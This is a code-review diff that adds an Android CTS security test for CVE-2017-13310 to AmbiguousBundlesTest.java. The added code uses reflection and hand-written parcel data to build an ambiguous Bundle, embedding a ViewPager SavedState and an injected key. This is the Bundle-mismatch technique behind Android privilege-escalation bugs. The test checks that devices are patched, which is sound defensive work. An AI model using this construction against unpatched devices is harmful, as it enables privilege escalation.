CTS test for Android Security b/77874343 b/71992105

Test: successful run of newly introduced CTS test case.
Bug:77874343
Bug:71992105
Change-Id: Ie5614adb086c1b201ada40c43924b02d7685a63b
diff --git a/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java b/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
index ae5bc8e..e7126ed 100644
--- a/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
+++ b/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
@@ -23,6 +23,9 @@
 import android.os.Bundle;
 import android.os.Parcel;
 import android.os.Parcelable;
+import android.view.AbsSavedState;
+import android.view.View;
+import android.view.View.BaseSavedState;
 import android.annotation.SuppressLint;
 
 import java.io.InputStream;
@@ -35,6 +38,96 @@
 public class AmbiguousBundlesTest extends AndroidTestCase {
 
     /*
+     * b/71992105
+     */
+    @SecurityTest(minPatchLevel = "2018-05")
+    public void test_android_CVE_2017_13310() throws Exception {
+
+        Ambiguator ambiguator = new Ambiguator() {
+
+            {
+                parcelledDataField = BaseBundle.class.getDeclaredField("mParcelledData");
+                parcelledDataField.setAccessible(true);
+            }
+
+            @Override
+            public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+                Random random = new Random(1234);
+                int minHash = 0;
+                for (String s : preReSerialize.keySet()) {
+                    minHash = Math.min(minHash, s.hashCode());
+                }
+                for (String s : postReSerialize.keySet()) {
+                    minHash = Math.min(minHash, s.hashCode());
+                }
+
+                String key;
+                int keyHash;
+
+                do {
+                    key = randomString(random);
+                    keyHash = key.hashCode();
+                } while (keyHash >= minHash);
+
+                padBundle(postReSerialize, preReSerialize.size(), minHash, random);
+                padBundle(preReSerialize, postReSerialize.size(), minHash, random);
+
+                String key2;
+                int key2Hash;
+                do {
+                    key2 = makeStringToInject(random);
+                    key2Hash = key2.hashCode();
+                } while (key2Hash >= minHash || key2Hash <= keyHash);
+
+
+                Parcel parcel = Parcel.obtain();
+
+                parcel.writeInt(preReSerialize.size() + 2);
+                parcel.writeString(key);
+
+                parcel.writeInt(VAL_PARCELABLE);
+                parcel.writeString("com.android.internal.widget.ViewPager$SavedState");
+
+                (new View.BaseSavedState(AbsSavedState.EMPTY_STATE)).writeToParcel(parcel, 0);
+
+                parcel.writeString(key2);
+                parcel.writeInt(VAL_BUNDLE);
+                parcel.writeBundle(postReSerialize);
+
+                writeBundleSkippingHeaders(parcel, preReSerialize);
+
+                parcel.setDataPosition(0);
+                Bundle bundle = new Bundle();
+                parcelledDataField.set(bundle, parcel);
+                return bundle;
+            }
+
+            private String makeStringToInject(Random random) {
+                Parcel p = Parcel.obtain();
+                p.writeInt(VAL_INTARRAY);
+                p.writeInt(13);
+
+                for (int i = 0; i < VAL_INTARRAY / 2; i++) {
+                    int paddingVal;
+                    if(1 > 3) {
+                        paddingVal = 0x420041 + (i << 17) + (i << 1);
+                    } else {
+                        paddingVal = random.nextInt();
+                    }
+                    p.writeInt(paddingVal);
+                }
+
+                p.setDataPosition(0);
+                String result = p.readString();
+                p.recycle();
+                return result;
+            }
+        };
+
+        testAmbiguator(ambiguator);
+    }
+
+    /*
      * b/71508348
      */
     @SecurityTest(minPatchLevel = "2018-06")
@@ -42,8 +135,6 @@
 
         Ambiguator ambiguator = new Ambiguator() {
 
-            private final Field parcelledDataField;
-
             private static final String BASE_PARCELABLE = "android.telephony.CellInfo";
             private final Parcelable smallerParcelable;
             private final Parcelable biggerParcelable;
@@ -412,7 +503,7 @@
         protected static final int BUNDLE_MAGIC = 0x4C444E42;
         protected static final int INNER_BUNDLE_PADDING = 1;
 
-        protected final Field parcelledDataField;
+        protected Field parcelledDataField;
 
         public Ambiguator() throws Exception {
             parcelledDataField = BaseBundle.class.getDeclaredField("mParcelledData");